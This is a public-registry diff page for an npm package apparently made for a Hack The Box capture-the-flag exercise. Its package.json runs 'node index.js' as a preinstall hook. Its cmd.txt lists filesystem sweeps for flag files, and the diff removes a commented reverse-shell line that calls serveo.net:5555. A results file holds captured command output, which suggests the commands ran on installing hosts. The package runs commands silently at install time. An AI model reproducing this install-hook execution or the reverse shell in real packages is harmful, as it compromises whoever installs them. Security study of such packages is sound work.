ect-987654-ctf 0.0.12 → 0.1.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/cmd.txt CHANGED
@@ -8,11 +8,3 @@ tar -tzf /home/node/aspect-node.tar.gz | head -n 200 || echo "tar list failed"
8
8
  find /home/node -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null || true
9
9
  find / -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null | head -n 200
10
10
  # if you find promising files, cat them (you can add new lines like: cat /path/to/thatfile)
11
- #bash -c 'bash -i >& /dev/tcp/serveo.net/5555 0>&1'
12
- find / -type f -exec strings {} + 2>/dev/null | grep -Eo "HTB\{[^}]+\}" | head -n 50
13
- grep -R --text --color=never -Eo "HTB\{[^}]+\}" / 2>/dev/null | head -n 100
14
- # kalau tak jumpa, cuba dalam /home
15
- grep -R --text --color=never -Eo "HTB\{[^}]+\}" /home 2>/dev/null | head -n 100
16
- # kalau tak jumpa jugak, cuba dalam /opt
17
- grep -R --text --color=never -Eo "HTB\{[^}]+\}" /opt 2>/dev/null | head -n 100
18
-
package/evil.yaml CHANGED
@@ -1,6 +1,6 @@
1
1
  ecto_module:
2
2
  name: "ect-987654-ctf"
3
- version: "0.0.11"
4
- power_level: Very High butow
3
+ version: "0.0.10"
4
+ power_level: Very High
5
5
  ship_deck: Beta-2
6
6
  cargo_hold: B2-13
package/last_post.json CHANGED
@@ -1,5 +1,3 @@
1
1
  {
2
- "host": "centos",
3
- "checked_count": 0,
4
- "hits": []
2
+ "error": "Command failed: pwd\n'pwd' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
5
3
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ect-987654-ctf",
3
- "version": "0.0.12",
3
+ "version": "0.1.11",
4
4
  "scripts": {
5
5
  "preinstall": "node index.js"
6
6
  }